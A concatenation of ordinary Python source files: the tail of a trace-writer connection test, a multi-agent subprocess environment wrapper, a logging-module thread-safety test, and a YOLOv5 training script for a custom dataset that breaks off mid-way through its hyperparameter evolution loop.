# Do an initial flush to get a connection
writer.flush_queue()
assert writer._conn is None
writer.flush_queue()
assert writer._conn is None
def test_writer_reuse_connections_false():
# Ensure connection is reused
writer = AgentWriter(agent_url="http://localhost:9126", reuse_connections=False)
# Do an initial flush to get a connection
writer.flush_queue()
conn = writer._conn
# And another to potentially have it reset
writer.flush_queue()
assert writer._conn is conn
|
env_wrappers.py
|
"""
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
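# worker() runs in a child process and serves commands arriving over a Pipe:
#   'step'            -> env.step(data); auto-resets the env once all agents are done
#   'reset'           -> env.reset()
#   'reset_task'      -> env.reset_task()
#   'close'           -> close the pipe and exit the loop
#   'get_spaces'      -> (observation_space, action_space)
#   'get_agent_types' -> one 'adversary'/'agent' label per agent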
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if all(done):
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'get_agent_types':
if all([hasattr(a, 'adversary') for a in env.agents]):
remote.send(['adversary' if a.adversary else 'agent' for a in
env.agents])
else:
remote.send(['agent' for _ in env.agents])
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(('get_agent_types', None))
self.agent_types = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
if all([hasattr(a, 'adversary') for a in env.agents]):
self.agent_types = ['adversary' if a.adversary else 'agent' for a in
env.agents]
else:
self.agent_types = ['agent' for _ in env.agents]
self.ts = np.zeros(len(self.envs), dtype='int')
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if all(done):
obs[i] = self.envs[i].reset()
self.ts[i] = 0
self.actions = None
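# In addition to the standard (obs, rews, dones, infos), step_wait also returns a
# per-agent validity list taken from each agent's `reliable` attribute on the first
# environment (note this differs from SubprocVecEnv.step_wait above).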
validity = [a.reliable for a in self.envs[0].agents]
return np.array(obs), np.array(rews), np.array(dones), infos, validity
def reset(self):
results = [env.reset() for env in self.envs]
validity = [a.reliable for a in self.envs[0].agents]
return np.array(results), validity
def render(self, close = True):
results = [env.render(close=close) for env in self.envs]
return results
def close(self):
return
|
log_test16.py
|
#!/usr/bin/env python
#
# Copyright 2001-2002 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
#
"""
A test harness for the logging module. Tests thread safety.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
"""
import logging, logging.handlers, thread, threading, random
logging.raiseExceptions = 1
NUM_THREADS = 10
LOOP_COUNT = 10000
LOG_MESSAGES = [
(logging.DEBUG, "%3d This is a %s message", "debug"),
(logging.INFO, "%3d This is an %s message", "informational"),
(logging.WARNING, "%3d This is a %s message", "warning"),
(logging.ERROR, "%3d This is an %s message", "error"),
(logging.CRITICAL, "%3d This is a %s message", "critical"),
]
LOG_NAMES = ["A", "A.B", "A.B.C", "A.B.C.D"]
def doLog(num):
logger = logging.getLogger('')
logger.info("*** thread %s started (%d)", thread.get_ident(), num)
for i in xrange(LOOP_COUNT):
logger = logging.getLogger(random.choice(LOG_NAMES))
a = random.choice(LOG_MESSAGES)
args = a[0:2] + (num,) + a[2:]
apply(logger.log, args)
def test():
f = logging.Formatter("%(asctime)s %(levelname)-9s %(name)-8s %(thread)5s %(message)s")
root = logging.getLogger('')
root.setLevel(logging.DEBUG)
h = logging.FileHandler('thread.log', 'w')
root.addHandler(h)
h.setFormatter(f)
h = logging.handlers.SocketHandler('localhost', logging.handlers.DEFAULT_TCP_LOGGING_PORT)
#h = logging.handlers.DatagramHandler('localhost', logging.handlers.DEFAULT_UDP_LOGGING_PORT)
root.addHandler(h)
threads = []
for i in xrange(NUM_THREADS):
threads.append(threading.Thread(target=doLog, args=(len(threads),)))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
test()
|
run_yolov5_train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test  # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, is_parallel
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None, wandb=None):
logger.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
save_dir, epochs, batch_size, total_batch_size, weights, rank = \
Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
# Directories
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'fp60_best.pt'
results_file = save_dir / 'results.txt'
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != 'cpu'
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict['train']
test_path = data_dict['val']
nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data) # check
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (opt.cfg or hyp.get('anchors')) and not opt.resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / total_batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# Logging
if rank in [-1, 0] and wandb and wandb.run is None:
opt.hyp = hyp # add hyperparameters
wandb_run = wandb.init(config=opt, resume="allow",
project='YOLOv5' if opt.project == 'runs/train' else Path(opt.project).stem,
name=save_dir.stem,
entity=opt.entity,
id=ckpt.get('wandb_id') if 'ckpt' in locals() else None)
loggers = {'wandb': wandb} # loggers dict
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if opt.resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info('Using SyncBatchNorm()')
# Trainloader
dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
world_size=opt.world_size, workers=opt.workers,
image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
# Process 0
if rank in [-1, 0]:
testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader
hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,
world_size=opt.world_size, workers=opt.workers,
pad=0.5, prefix=colorstr('val: '))[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram('classes', c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank)
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
logger.info(f'Image sizes {imgsz} train, {imgsz_test} test\n'
f'Using {dataloader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if rank != -1:
indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if rank != -1:
loss *= opt.world_size # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
'%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(model, imgs) # add model to tensorboard
elif plots and ni == 10 and wandb:
wandb.log({"Mosaics": [wandb.Image(str(x), caption=x.name) for x in save_dir.glob('train*.jpg')
if x.exists()]}, commit=False)
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
results, maps, times = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
log_imgs=opt.log_imgs if wandb else 0,
compute_loss=compute_loss)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
if len(opt.name) and opt.bucket:
os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb:
wandb.log({tag: x}, step=epoch, commit=tag == tags[-1]) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
# Save model
if (not opt.nosave) or (final_epoch and not opt.evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(model.module if is_parallel(model) else model).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_run.id if wandb else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Strip optimizers
final = best if best.exists() else last # final model
for f in last, best:
if f.exists():
strip_optimizer(f)
if opt.bucket:
os.system(f'gsutil cp {final} gs://{opt.bucket}/weights') # upload
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb.log({"Results": [wandb.Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
if opt.log_artifacts:
wandb.log_artifact(artifact_or_path=str(final), type='model', name=save_dir.stem)
# Test fp60_best.pt
logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
if opt.data.endswith('coco.yaml') and nc == 80: # if COCO
for m in ((last, best) if best.exists() else (last,)):  # speed, mAP tests
results, _, _ = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
conf_thres=0.001,
iou_thres=0.7,
model=attempt_load(m, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=True,
plots=False)
else:
dist.destroy_process_group()
wandb.run.finish() if wandb and wandb.run else None
torch.cuda.empty_cache()
return results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='weights/yolov5m.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='models/yolov5m.yaml', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/FP60_family.yaml', help='data.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=4, help='total batch size for all GPUs')
parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--notest', action='store_true', help='only test final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
parser.add_argument('--log-imgs', type=int, default=16, help='number of images for W&B logging, max 100')
parser.add_argument('--log-artifacts', action='store_true', help='log artifacts, i.e. final trained model')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
opt = parser.parse_args()
# Set DDP variables
opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
if opt.resume: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
opt.cfg, opt.weights, opt.resume, opt.batch_size, opt.global_rank, opt.local_rank = '', ckpt, True, opt.total_batch_size, *apriori # reinstate
logger.info('Resuming training from %s' % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size)))  # extend to 2 sizes (train, test)
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device('cuda', opt.local_rank)
dist.init_process_group(backend='nccl', init_method='env://') # distributed backend
assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
try:
import wandb
except ImportError:
wandb = None
prefix = colorstr('wandb: ')
logger.info(f"{prefix}Install Weights & Biases for YOLOv5 logging with 'pip install wandb' (recommended)")
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
logger.info(f'Start Tensorboard with "tensorboard --logdir {opt.project}", view at http://localhost:6006/')
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer, wandb)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
'mosaic': (1, 0.0, 1.0),  # image mosaic (probability)
'mixup': (1, 0.0, 1.0)} # image mixup (probability)
assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
opt.notest, opt.nosave = True, True  # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
